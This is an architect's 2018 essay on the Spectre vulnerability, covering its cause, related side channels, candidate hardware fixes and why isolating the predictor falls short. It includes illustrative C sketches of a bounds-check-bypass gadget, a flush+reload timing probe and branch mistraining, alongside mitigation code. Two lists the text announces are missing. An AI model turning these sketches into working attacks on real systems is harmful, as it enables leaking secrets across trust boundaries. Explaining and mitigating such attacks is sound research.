Spectacular

January 16, 2018

Spectre has nerdsniped me, hard. I’ve been walking into lampposts and stuff. The more I think about it, the less I understand it.

The first shocking thing is that, once you read about it, the problem is so easy to see. To summarize: predictor state is untrusted, and mispredicted execution paths can leave traces in the memory system, so malicious code can observe the behavior of “impossible” paths. It’s a fundamental problem in an idea that’s been architectural gospel for decades. It’s one of those obvious-in-retrospect epiphanies that makes me rethink everything.
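
To make the summary concrete, here is a minimal sketch of a bounds-check-bypass gadget in the style of the Spectre proof of concept. The array names and sizes are hypothetical, and a real attack needs careful predictor training and a timing step on top of this:

    #include <stddef.h>
    #include <stdint.h>

    uint8_t array1[16];
    size_t  array1_size = 16;
    uint8_t array2[256 * 4096];   /* probe array: one page per possible byte value */
    uint8_t temp;                 /* keeps the compiler from dropping the access */

    /* The bounds check makes the out-of-bounds read architecturally
     * "impossible," but a mispredicted branch can still perform it
     * speculatively, and the secret-dependent touch of array2 leaves a
     * trace in the cache that survives the rollback. */
    void victim(size_t x) {
        if (x < array1_size) {                 /* trained to predict "taken" */
            uint8_t secret = array1[x];        /* speculative out-of-bounds load */
            temp &= array2[secret * 4096];     /* encodes secret in cache state */
        }
    }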

The second thing is that it’s not just about speculation. We now live in a world with side channels in microarchitectures that leave no real trace in the machine’s architectural state. There is already work on leaks through prefetching, where someone learns about your activity by observing how it affected a reverse-engineered prefetcher. You can imagine similar attacks on TLB state, store buffer coalescing, coherence protocols, or even replacement policies. Suddenly, the SMT side channel doesn’t look so bad.
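
The observation step in these attacks is almost boringly simple. A flush+reload probe, for example, just times a load; the sketch below assumes x86 intrinsics and an uncalibrated 100-cycle threshold, so treat it as an illustration rather than a working measurement:

    #include <stdint.h>
    #include <x86intrin.h>   /* _mm_clflush, _mm_mfence, __rdtscp */

    /* Flush+reload probe: evict a line, let the victim run, then time a
     * reload.  A fast reload means someone touched the line in between,
     * even if that someone was a mispredicted path. */
    static int line_was_touched(const void *addr) {
        unsigned aux;

        _mm_clflush(addr);                        /* evict the line */
        _mm_mfence();

        /* ... victim code runs here ... */

        uint64_t start = __rdtscp(&aux);
        (void)*(volatile const uint8_t *)addr;    /* timed reload */
        uint64_t end = __rdtscp(&aux);

        return (end - start) < 100;               /* illustrative hit threshold */
    }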

Sufficient Conditions

But the main thing that mystifies me is how to fix it. What is the weakest possible restriction on speculation that would prevent Spectre? There are the easy, strong conditions:

It suffices for an architecture to do any of these things, or to pretend to do them by, for example, rolling back the microarchitectural state when a misspeculation resolves. These are crude solutions, but maybe this is where the Spectre story will end. Maybe processor designers will stop speculating through L1 misses, take the performance L, and move on.
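
Software, for what it’s worth, is already paying that performance L by hand. Here’s a sketch of the two usual tricks, assuming x86 and a power-of-two table size: a fence that refuses to speculate past the bounds check, and an index mask that makes the speculative path harmless even when it runs:

    #include <stddef.h>
    #include <stdint.h>
    #include <x86intrin.h>   /* _mm_lfence */

    static uint8_t table[16];
    static size_t  table_size = 16;   /* power of two, so the mask below is valid */

    /* Two software-level ways to say "don't speculate here": the lfence
     * keeps younger loads from issuing until the bounds check resolves,
     * and the mask clamps the index even on a mispredicted path. */
    uint8_t read_checked(size_t i) {
        if (i < table_size) {
            _mm_lfence();            /* speculation barrier */
            i &= table_size - 1;     /* index masking */
            return table[i];
        }
        return 0;
    }

Both are blunt, sufficient-but-not-necessary conditions, which is exactly the flavor of the hardware fixes above.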

But I have a feeling that these restrictions are too strong. There are situations where speculative misses should be safe to service, if the hardware could detect them:

Each of these conditions represents an exception to the no-speculative-misses rule. Piecemeal exceptions are unsatisfying, though. I’m suspicious that there’s a clean, general rule for deciding which speculative accesses are safe. Even if that sufficient condition is wildly impractical to enforce in hardware, we should nail it down.

An Insufficient Fix

One tempting mitigation is to isolate the predictor state. The proof-of-concept attacks we know about rely on the attacker’s ability to manipulate the predictor into mispredicting in useful ways. Without carefully orchestrated BTB collisions, malicious code would not be able to “mistrain” the predictor to bend it to its will. For example, consider an architecture that flushes the BTB or swaps its state when transitioning between trusted and untrusted code. The untrusted code can execute as many cleverly crafted branches as it likes, but only trusted-code branches can influence trusted-code predictions.

While predictor isolation makes Spectre attacks more difficult, it cannot prevent them. Even if untrusted branch instructions can’t manipulate the BTB, malicious inputs can still influence the outcomes of branches in trusted code. An attacker can identify input-dependent branches in the kernel or browser that collide in the BTB with a target branch. This way, the attacker can manipulate trusted code into plotting its own demise.
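
The simplest version of the trick uses the victim branch to mistrain itself. Here’s a sketch, with a hypothetical trusted entry point standing in for a real syscall or browser API; the attacker never executes a colliding branch of its own, only benign-looking calls with arguments it controls:

    #include <stddef.h>

    /* Hypothetical trusted entry point: a bounds-checked table lookup in
     * the kernel or browser, reachable with an attacker-supplied index. */
    extern long trusted_lookup(size_t index);

    /* "In-place" mistraining: call the trusted branch with many in-bounds
     * indices so the predictor learns "taken," then pass a single
     * out-of-bounds index.  Flushing the BTB at the trust boundary doesn't
     * help, because every branch involved belongs to trusted code. */
    void mistrain_in_place(size_t out_of_bounds_index) {
        for (int i = 0; i < 1000; i++)
            trusted_lookup((size_t)(i % 16));    /* benign training calls */

        trusted_lookup(out_of_bounds_index);     /* mispredicted, leaky call */
    }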

The Bright Side

Spectre may have driven me to distraction, but like many architects, I see an upside too. Perhaps this shock will spur a transition to richer hardware–software interfaces that let programs express more nuanced security policies than traditional protection rings allow.

Perhaps this mess will hasten the end of the von Neumann abstraction. When we tell the Spectre story in five years, we may say that it arose from the widening semantic gap between an ISA paradigm from the 1960s and a high-performance execution engine from the 2010s. Maybe it’s time to expose a more detailed model of how modern processors actually work, so software has a chance in hell of auditing it for security. Dormant VLIW and EDGE boosters, rejoice.